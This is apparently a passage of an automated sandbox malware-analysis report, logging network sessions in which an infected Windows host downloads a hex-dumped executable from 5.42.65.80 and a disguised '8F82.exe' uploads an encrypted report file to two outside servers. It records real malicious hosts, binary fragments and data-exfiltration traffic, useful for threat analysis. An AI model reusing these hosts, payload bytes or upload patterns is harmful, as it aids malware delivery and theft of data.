04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWeN @ @@K H.textT `.rsrc@@.reloc @B0HL(I0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Nov 18, 2023 10:02:49.762415886 CET	32209	IN	Data Raw: 01 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}{
Nov 18, 2023 10:02:49.762444019 CET	32210	IN	Data Raw: 00 00 0a 3a 7a ff ff ff de 0c 11 05 2c 07 11 05 6f 1a 00 00 0a dc de 0a 07 2c 06 07 6f 1a 00 00 0a dc de 0a 06 2c 06 06 6f 1a 00 00 0a dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 Data Ascii: :z,o,o,o(0r]p((I,0(JoK(&06(L(M((L(MYj/&*/
Nov 18, 2023 10:02:49.762454987 CET	32212	IN	Data Raw: 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 Data Ascii: f04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fx
Nov 18, 2023 10:02:49.762475014 CET	32213	IN	Data Raw: 00 21 4f 20 41 2b 4e 14 65 14 72 17 72 6b 0a 30 00 66 36 5a 33 56 0d 6f 41 03 20 03 70 44 6c 0f 63 19 74 0f 6f 5e 20 5c 61 19 20 0f 61 01 65 4d 61 0c 20 55 74 12 65 15 70 12 20 44 6f 14 6c 05 61 06 20 11 68 08 20 21 20 46 75 08 74 11 6d 03 20 5c Data Ascii: !O A+Nerrk0f6Z3VoA pDlcto^ \a aeMa Utep Dola h ! Futm \iVrr norQcl.lP\eUs otc @h plYcUto' up[r emf[rJmr noFmto.=4jb76]3Q>-FAtm@tt s S+Lcd r_mti sebXyFdrnW Zaie
Nov 18, 2023 10:02:49.762490034 CET	32214	IN	Data Raw: 74 11 6e 01 20 40 6f 5d 6e 1e 20 11 75 15 70 02 72 16 20 5a 6f 12 20 14 6f 07 64 55 64 39 0a 6a 00 62 00 28 69 0e 72 0d 73 5b 66 12 20 2e 69 15 75 51 6c 14 43 41 2b 42 52 10 6e 19 69 0f 65 14 4c 0f 62 0a 61 14 79 30 00 34 00 60 0a 62 00 4b 2e 43 Data Ascii: tn @o]n upr Zo odUd9jb(irs[f .iuQlCA+BRnieLbay04`bK.C^pFormFnQmQ nnw>bfutm urFo!h5rgaY:Fxf01jiemb)f\|f04bamb4xn04jeeb4ff84jbmj4fx0<jbeb<f
Nov 18, 2023 10:02:49.762507915 CET	32216	IN	Data Raw: 74 0d 72 42 00 0d 76 07 63 40 6f 14 20 1c 65 15 74 42 75 57 74 05 72 42 69 11 65 1f 61 16 6f 46 27 66 00 78 00 06 76 55 63 40 6f 18 20 01 6f 0b 73 19 72 17 63 40 6f 14 20 11 74 03 72 51 74 5b 72 4d 00 62 00 05 73 0e 61 0e 61 46 20 02 65 14 65 12 Data Ascii: trBvc@o etBuWtrBieaoF'fxvUc@o osrc@o trQt[rMbsaaF eei^gdsrco'4fdfQuXtJcntut[rFcouBejvco PeeigdQsrco'b4vaedQsrco'bTsrn'04lclMsa@i urT'4jtpo'4fva\lv
Nov 18, 2023 10:02:49.762521029 CET	32217	IN	Data Raw: 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 46 00 58 00 46 00 10 00 14 00 4a 00 42 00 45 00 4d 00 4a 00 1c 00 4e 00 50 00 4e 00 10 00 14 00 4a 00 42 00 45 00 4d 00 42 00 14 00 46 00 58 00 46 00 10 00 14 00 4a 00 42 00 45 Data Ascii: fxf04jbemb4FXFJBEMJNPNJBEMBFXFJBEMB\|vhv $zru}r$vhv $zru}rkcdlc5gyg15kcdlc5gyg $zru}6h`go`6
Nov 18, 2023 10:02:49.762562037 CET	32221	IN	Data Raw: 67 02 69 08 6b 09 6d 03 6f 12 71 46 73 12 75 0e 77 1e 79 4a 7b 48 7d 14 7f e2 81 e7 83 e9 85 e4 87 bc 89 ec 8b f4 8d e8 8f a0 91 a6 93 fe 95 f4 97 fd 99 f7 9b fe 9d aa 9f c6 a1 da a3 c2 a5 96 a7 9c a9 c0 ab ce ad cb af dd b1 d0 b3 80 b5 d0 b7 c0 Data Ascii: gikmoqFsuwyJ{H}
Nov 18, 2023 10:02:49.762567997 CET	32222	IN	Data Raw: 6f 5a 65 00 61 16 75 08 6f 56 61 58 61 12 61 01 75 45 6c 0c 72 17 77 41 77 13 62 0d 74 13 6d 59 76 5b 78 05 78 0b 64 45 76 0c 7a 0d 67 41 79 13 6a 19 62 09 7a 45 66 5b 63 6a 00 16 00 10 00 1e 00 17 00 44 00 03 00 13 00 13 00 56 00 34 00 01 00 07 Data Ascii: oZeauoVaXaauElrwAwbtmYv[xxdEvzgAyjbzEf[cjDV4XUJHTXbeaiRoeeuIaLi iai NieeiWu_e oiouDeii RiGoaeoeaZiuaiSoFjQKTPemeGeieu^u4j
Nov 18, 2023 10:02:50.083754063 CET	32408	IN	Data Raw: 00 74 00 6a 00 f2 31 25 00 6d 00 62 00 34 00 66 00 78 00 66 00 74 50 b4 00 8a 31 22 00 65 00 6d 00 62 00 34 00 65 00 78 00 96 31 70 00 34 32 2a 00 02 31 25 00 99 32 22 00 34 00 66 00 3c 50 e6 00 32 00 34 00 6a 00 62 00 9a ff 92 ff 62 00 34 00 26 Data Ascii: tj1%mb4fxftP1"emb4ex1p421%2"4f<P24jbb4&x1p4jbembh3&04jbemP"28f04jce92"h2&xf@Pjbemfx&0p2bemb4fP2tjbem`4282p2*beP5fxf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
105	5.42.65.80	80	192.168.2.4	49764	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:49.438163042 CET	31980	OUT	GET /brandrock.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: 5.42.65.80
Nov 18, 2023 10:02:49.762403011 CET	32208	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 18 Nov 2023 09:02:49 GMT Content-Type: application/octet-stream Content-Length: 12832256 Last-Modified: Fri, 17 Nov 2023 15:57:58 GMT Connection: keep-alive ETag: "65578d86-c3ce00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 86 8d 57 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 c4 c3 00 00 08 00 00 00 00 00 00 4e e3 c3 00 00 20 00 00 00 00 c4 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 c4 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e3 c3 00 4b 00 00 00 00 00 c4 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 c4 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 54 c3 c3 00 00 20 00 00 00 c4 c3 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 04 00 00 00 00 c4 00 00 06 00 00 00 c6 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 c4 00 00 02 00 00 00 cc c3 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 e3 c3 00 00 00 00 00 48 00 00 00 02 00 05 00 4c cd c3 00 b4 15 00 00 03 00 00 00 01 00 00 06 00 28 00 00 49 a5 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 5f 01 00 00 01 00 00 11 7e 03 00 00 04 2c 0d 28 11 00 00 06 2c 06 16 28 0d 00 00 0a 7e 04 00 00 04 2c 0d 28 13 00 00 06 2c 06 16 28 0d 00 00 0a 7e 05 00 00 04 2c 0d 28 15 00 00 06 2c 06 16 28 0d 00 00 0a 7e 06 00 00 04 2c 0d 28 16 00 00 06 2c 06 16 28 0d 00 00 0a 7e 01 00 00 04 2c 10 7e 02 00 00 04 20 e8 03 00 00 5a 28 0e 00 00 0a 7e 07 00 00 04 2c 11 72 01 00 00 70 72 01 00 00 70 16 28 09 00 00 06 26 16 0a 38 c2 00 00 00 7e 0c 00 00 04 06 6f 0f 00 00 0a 0b 7e 0d 00 00 04 06 6f 0f 00 00 0a 0c 7e 0e 00 00 04 06 6f 0f 00 00 0a 0d 7e 0f 00 00 04 06 6f 0f 00 00 0a 13 04 07 28 08 00 00 06 13 05 7e 0a 00 00 04 2c 09 11 05 28 02 00 00 06 13 05 7e 09 00 00 04 72 03 00 00 70 28 10 00 00 0a 2c 1a 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 11 05 28 04 00 00 06 13 05 2b 29 7e 09 00 00 04 72 31 00 00 70 28 10 00 00 0a 2c 18 11 05 28 11 00 00 0a 72 19 00 00 70 6f 12 00 00 0a 28 03 00 00 06 13 05 11 04 07 08 28 13 00 00 0a 28 14 00 00 0a 13 06 11 05 11 06 28 0d 00 00 06 11 06 09 28 0f 00 00 06 06 17 58 0a 06 7e 0c 00 00 04 6f 15 00 00 0a 3f 2e ff ff ff 7e 08 00 00 04 26 2a 00 1b 30 02 00 2f 00 00 00 02 00 00 11 02 73 16 00 00 0a 0a 73 17 00 00 0a 0b 06 16 73 18 00 00 0a 0c 08 07 6f 19 00 00 0a de 0a 08 2c 06 08 6f 1a 00 00 0a dc 07 6f 1b 00 00 0a 2a 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELWeN @ @@K H.textT `.rsrc@@.reloc @B0HL(I0_~,(,(~,(,(~,(,(~,(,(~,~ Z(~,rprp(&8~o~o~o~o(~,(~rp(,(rpo(+)~r1p(,(rpo(((((X~o?.~&0/ssso,oo
Nov 18, 2023 10:02:49.762415886 CET	32209	IN	Data Raw: 01 10 00 00 02 00 15 00 09 1e 00 0a 00 00 00 00 13 30 06 00 28 00 00 00 03 00 00 11 02 8e 69 8d 1a 00 00 01 0a 16 0b 2b 13 06 07 02 07 91 03 07 03 8e 69 5d 91 61 d2 9c 07 17 58 0b 07 02 8e 69 32 e7 06 2a 36 02 03 28 06 00 00 06 28 01 00 00 2b 2a Data Ascii: 0(i+i]aXi26((+0c (~-s~(+(++ i]XX _(X 2(!*0w{X _}{
Nov 18, 2023 10:02:49.762444019 CET	32210	IN	Data Raw: 00 00 0a 3a 7a ff ff ff de 0c 11 05 2c 07 11 05 6f 1a 00 00 0a dc de 0a 07 2c 06 07 6f 1a 00 00 0a dc de 0a 06 2c 06 06 6f 1a 00 00 0a dc 16 2a 11 04 2a 00 00 00 01 28 00 00 02 00 1a 00 8a a4 00 0c 00 00 00 00 02 00 12 00 a0 b2 00 0a 00 00 00 00 Data Ascii: :z,o,o,o(0r]p((I,0(JoK(&06(L(M((L(MYj/&*/
Nov 18, 2023 10:02:49.762454987 CET	32212	IN	Data Raw: 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 Data Ascii: f04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fxf04jbemb4fx
Nov 18, 2023 10:02:49.762475014 CET	32213	IN	Data Raw: 00 21 4f 20 41 2b 4e 14 65 14 72 17 72 6b 0a 30 00 66 36 5a 33 56 0d 6f 41 03 20 03 70 44 6c 0f 63 19 74 0f 6f 5e 20 5c 61 19 20 0f 61 01 65 4d 61 0c 20 55 74 12 65 15 70 12 20 44 6f 14 6c 05 61 06 20 11 68 08 20 21 20 46 75 08 74 11 6d 03 20 5c Data Ascii: !O A+Nerrk0f6Z3VoA pDlcto^ \a aeMa Utep Dola h ! Futm \iVrr norQcl.lP\eUs otc @h plYcUto' up[r emf[rJmr noFmto.=4jb76]3Q>-FAtm@tt s S+Lcd r_mti sebXyFdrnW Zaie
Nov 18, 2023 10:02:49.762490034 CET	32214	IN	Data Raw: 74 11 6e 01 20 40 6f 5d 6e 1e 20 11 75 15 70 02 72 16 20 5a 6f 12 20 14 6f 07 64 55 64 39 0a 6a 00 62 00 28 69 0e 72 0d 73 5b 66 12 20 2e 69 15 75 51 6c 14 43 41 2b 42 52 10 6e 19 69 0f 65 14 4c 0f 62 0a 61 14 79 30 00 34 00 60 0a 62 00 4b 2e 43 Data Ascii: tn @o]n upr Zo odUd9jb(irs[f .iuQlCA+BRnieLbay04`bK.C^pFormFnQmQ nnw>bfutm urFo!h5rgaY:Fxf01jiemb)f\|f04bamb4xn04jeeb4ff84jbmj4fx0<jbeb<f
Nov 18, 2023 10:02:49.762507915 CET	32216	IN	Data Raw: 74 0d 72 42 00 0d 76 07 63 40 6f 14 20 1c 65 15 74 42 75 57 74 05 72 42 69 11 65 1f 61 16 6f 46 27 66 00 78 00 06 76 55 63 40 6f 18 20 01 6f 0b 73 19 72 17 63 40 6f 14 20 11 74 03 72 51 74 5b 72 4d 00 62 00 05 73 0e 61 0e 61 46 20 02 65 14 65 12 Data Ascii: trBvc@o etBuWtrBieaoF'fxvUc@o osrc@o trQt[rMbsaaF eei^gdsrco'4fdfQuXtJcntut[rFcouBejvco PeeigdQsrco'b4vaedQsrco'bTsrn'04lclMsa@i urT'4jtpo'4fva\lv
Nov 18, 2023 10:02:49.762521029 CET	32217	IN	Data Raw: 00 66 00 78 00 66 00 30 00 34 00 6a 00 62 00 65 00 6d 00 62 00 34 00 46 00 58 00 46 00 10 00 14 00 4a 00 42 00 45 00 4d 00 4a 00 1c 00 4e 00 50 00 4e 00 10 00 14 00 4a 00 42 00 45 00 4d 00 42 00 14 00 46 00 58 00 46 00 10 00 14 00 4a 00 42 00 45 Data Ascii: fxf04jbemb4FXFJBEMJNPNJBEMBFXFJBEMB\|vhv $zru}r$vhv $zru}rkcdlc5gyg15kcdlc5gyg $zru}6h`go`6
Nov 18, 2023 10:02:49.762562037 CET	32221	IN	Data Raw: 67 02 69 08 6b 09 6d 03 6f 12 71 46 73 12 75 0e 77 1e 79 4a 7b 48 7d 14 7f e2 81 e7 83 e9 85 e4 87 bc 89 ec 8b f4 8d e8 8f a0 91 a6 93 fe 95 f4 97 fd 99 f7 9b fe 9d aa 9f c6 a1 da a3 c2 a5 96 a7 9c a9 c0 ab ce ad cb af dd b1 d0 b3 80 b5 d0 b7 c0 Data Ascii: gikmoqFsuwyJ{H}
Nov 18, 2023 10:02:49.762567997 CET	32222	IN	Data Raw: 6f 5a 65 00 61 16 75 08 6f 56 61 58 61 12 61 01 75 45 6c 0c 72 17 77 41 77 13 62 0d 74 13 6d 59 76 5b 78 05 78 0b 64 45 76 0c 7a 0d 67 41 79 13 6a 19 62 09 7a 45 66 5b 63 6a 00 16 00 10 00 1e 00 17 00 44 00 03 00 13 00 13 00 56 00 34 00 01 00 07 Data Ascii: oZeauoVaXaauElrwAwbtmYv[xxdEvzgAyjbzEf[cjDV4XUJHTXbeaiRoeeuIaLi iai NieeiWu_e oiouDeii RiGoaeoeaZiuaiSoFjQKTPemeGeieu^u4j
Nov 18, 2023 10:02:50.083754063 CET	32408	IN	Data Raw: 00 74 00 6a 00 f2 31 25 00 6d 00 62 00 34 00 66 00 78 00 66 00 74 50 b4 00 8a 31 22 00 65 00 6d 00 62 00 34 00 65 00 78 00 96 31 70 00 34 32 2a 00 02 31 25 00 99 32 22 00 34 00 66 00 3c 50 e6 00 32 00 34 00 6a 00 62 00 9a ff 92 ff 62 00 34 00 26 Data Ascii: tj1%mb4fxftP1"emb4ex1p421%2"4f<P24jbb4&x1p4jbembh3&04jbemP"28f04jce92"h2&xf@Pjbemfx&0p2bemb4fP2tjbem`4282p2*beP5fxf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	85.214.85.187	9090	192.168.2.4	49766	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:49.666161060 CET	32093	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 85.214.85.187:9090 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:51.266062975 CET	33055	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server 1.0 X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:02:51 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
106	192.168.2.4	49766	85.214.85.187	9090	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:49.666161060 CET	32093	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 85.214.85.187:9090 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:51.266062975 CET	33055	IN	HTTP/1.1 500 Internal Server Error Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server 1.0 X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:02:51 GMT Content-Length: 24 Connection: close Data Raw: 43 6f 75 6c 64 20 6e 6f 74 20 73 61 76 65 20 6d 65 74 61 64 61 74 61 0a Data Ascii: Could not save metadata

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	206.189.109.146	80	192.168.2.4	49768	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:51.589303970 CET	33307	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 206.189.109.146 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:51.947267056 CET	33633	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
Nov 18, 2023 10:02:52.248569012 CET	33978	OUT	Data Raw: 87 51 1b dc ed 65 dd d6 bc e4 67 a1 f2 3b 33 ec 96 aa c1 d8 a3 f0 14 e6 05 3f 0a 31 84 aa 5a bc c2 42 55 3b 27 41 80 71 40 fb c3 1e 62 4d c2 5b 9f ec 2e 40 cd 6e 09 49 a3 75 43 24 eb 23 c6 a4 29 1b 9b b8 a7 1e c7 99 9e cf a7 cc bb 6f 19 4b 23 5d Data Ascii: Qeg;3?1ZBU;'Aq@bM[.@nIuC$#)oK#]w_EJ*Z}6?qNC{5,)_<k-"lOkF'DqffxThs7fiJIch6;F#,O7m
Nov 18, 2023 10:02:52.248636961 CET	34000	OUT	Data Raw: d7 b3 b1 d4 fa 67 ed 7c a7 85 84 bb aa 66 79 cc 6b 26 70 ad 13 d7 f9 fc 79 79 57 c6 b2 9f ef 21 0a 2a b0 b2 4b 87 7e 3f 39 dd 10 71 e8 1b 99 1a 6a 23 00 6b db 47 e5 8b 04 84 b4 9b 00 39 88 3e 86 6d b0 d0 78 86 d3 4b 04 14 20 0c 68 62 78 80 85 54 Data Ascii: g\|fyk&pyyW!K~?9qj#kG9>mxK hbxTOhFA'{RR1.&MTik.3/'Cg\JGiS E3]7Vk>#,;bj'P7`R1eDUe
Nov 18, 2023 10:02:52.550229073 CET	34757	OUT	Data Raw: d1 97 04 f6 f1 9e 46 67 43 3a 25 39 ac f3 44 bb 48 6c e4 97 29 ca 01 3b c6 b4 f4 7c 5d 96 e0 37 11 5d bd 7d 6f 2a 31 f3 0c 13 20 73 60 08 a1 5f aa a4 6f 3e 32 db c2 82 57 b3 02 5e b5 f9 da fb bd 54 2f b5 24 fe bf 48 08 c9 a7 86 2b 9e 33 01 3f 09 Data Ascii: FgC:%9DHl);\|]7]}o*1 s`_o>2W^T/$H+3?+AGMY.-=br5]+Rb9^1@dvdvu$Z:_?TGK(UsDX3BA{onGA/X.h9Izzg6\U
Nov 18, 2023 10:02:52.550384045 CET	34782	OUT	Data Raw: 5b 84 3c d8 d4 31 f3 a1 2f 84 d0 9d ce f6 95 49 5e f7 ef 25 53 37 86 99 9a 0e 37 1b 77 5c 2c 9d d0 ea bb 40 1a fb 7e fb a5 7e 02 11 d5 7c 32 1e 51 8f 6b 89 97 e7 18 dc 27 f2 c5 39 62 3d d0 72 16 29 3e 42 fb b1 10 8d e1 22 ab e3 2f 55 cc bb 5c f1 Data Ascii: [<1/I^%S77w\,@~~\|2Qk'9b=r)>B"/U\P^`6^xG8s%LXriAJ{: _b[dQ++VXe7v`z`(oc\dSI0G329urxP{qRk=\|=#NZ@e2mzr@
Nov 18, 2023 10:02:52.550462961 CET	34790	OUT	Data Raw: 47 d4 7f d4 a9 53 03 1e b5 69 b9 b4 c5 71 fd 23 f4 b6 58 f9 5d c1 3c cf 7c 3a 36 47 cb 6c 52 0b 5a 63 50 5b bc fc d9 8b 30 6d 11 78 ca c4 eb 41 df ac bc 1d ef 83 69 63 d7 a6 0a e8 0b b2 a5 1e e6 0c 8e 02 17 47 df 18 55 77 ec fe 4e 07 ae ad 6f 17 Data Ascii: GSiq#X]<\|:6GlRZcP[0mxAicGUwNo:vB3^t B7+,5Ek@cs<y3aT\)^R'}OxO3hru{&}cUs 0s(`@rT>%I\LIxr?.#
Nov 18, 2023 10:02:52.852127075 CET	36317	OUT	Data Raw: 6d a5 e8 ab 4e e8 f5 03 4d 94 08 da 91 8b e3 d1 cc b7 2e d4 7b 52 33 c9 5f 5e c6 c3 cc e9 ac 8c f4 7c c7 74 4a c5 d1 94 eb 92 94 12 83 d4 4f a2 ce 6d 62 f6 3a d9 cc e0 64 b1 3d e0 5d b7 ed 67 e4 7a 22 e3 eb 95 b3 9d 54 71 76 27 cd c0 f1 44 88 9b Data Ascii: mNM.{R3_^\|tJOmb:d=]gz"Tqv'D}ZfhJi:YG#;Y8^pu^YF40O.vyF2Xz(W_(qGS"xKWwmSs(bFnDc_)v=S
Nov 18, 2023 10:02:52.852236032 CET	36342	OUT	Data Raw: d3 aa 6c 0a de f5 40 04 db b3 8f 4d 7b 98 c8 4f 7f f8 b7 0b 81 41 31 5b 89 4c bc 0b fe 09 62 44 d7 80 73 c4 94 cd 53 26 ba f8 07 6b 4d ba b1 fe 5e 8a 8a e4 f6 f2 6d 7f ae 9d c2 ca 45 9e a4 82 ae 83 65 8c bd f1 90 50 a4 cb 57 08 5b f2 c5 e6 97 19 Data Ascii: l@M{OA1[LbDsS&kM^mEePW[Zg0hOooii+Ok1N-=Ha!>x\%<Z2"\VyY6>z/z>Zl\|~9;,"@Cw9[0haT]
Nov 18, 2023 10:02:52.852514029 CET	36375	OUT	Data Raw: 97 1f 9e 3a 34 5d 4a 1a af 4c fc e0 12 e4 14 fa 4d e5 f7 6d 80 17 ed 0c fc 85 aa 65 e5 77 24 4d ce 22 75 ac f8 f3 03 c8 be 72 67 95 22 e9 9b f5 ee 6c 7a 55 3c e0 63 40 1a 12 4f db 57 2d b2 10 90 a4 4a 38 7a 6a 77 16 29 27 2e 5a 4f f5 55 b4 83 1f Data Ascii: :4]JLMmew$M"urg"lzU<c@OW-J8zjw)'.ZOUP 2\\X_.H[R78SR<_jO)>b2o4W$yXHiKfk8,O/i<Gdk8V@6RG<dow7W^$\O
Nov 18, 2023 10:02:53.154366016 CET	39106	IN	HTTP/1.1 400 Bad Request Content-Type: text/plain; charset=utf-8 Server: Transfer.sh HTTP Server X-Content-Type-Options: nosniff X-Made-With: <3 by DutchCoders X-Served-By: Proudly served by DutchCoders Date: Sat, 18 Nov 2023 09:02:53 GMT Content-Length: 26 Connection: close Data Raw: 52 65 73 74 72 69 63 74 65 64 20 66 69 6c 65 20 65 78 74 65 6e 73 69 6f 6e 0a Data Ascii: Restricted file extension

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
107	192.168.2.4	49768	206.189.109.146	80	C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe

Timestamp	kBytes transferred	Direction	Data
Nov 18, 2023 10:02:51.589303970 CET	33307	OUT	PUT /42asb_user%40813848_report.wsr HTTP/1.1 Host: 206.189.109.146 Content-Length: 147988 Expect: 100-continue Connection: Keep-Alive
Nov 18, 2023 10:02:51.947267056 CET	33633	OUT	Data Raw: 57 53 52 24 dd e8 dd b7 d6 dc a5 83 a6 b7 ac 77 2b eb 6f 24 b2 18 c8 e5 70 79 12 c2 38 af f7 a7 e5 13 05 cc 8b db 9a 00 77 d6 e2 4d c1 11 2d 1d 36 cb 7c 28 c8 4a db bd 49 b9 19 a4 d9 0c 44 2c 5f 01 da ca 6e 00 6c 4c 8b ea c9 26 ad 94 26 61 12 9a Data Ascii: WSR$w+o$py8wM-6\|(JID,_nlL&&a}t_VI5d.WVWj-F/8f{Qa\/g4 Ci]`[q7HP(bn@Ad5hUIR7@D%&\|{F4"6v 'B)z{+a#-
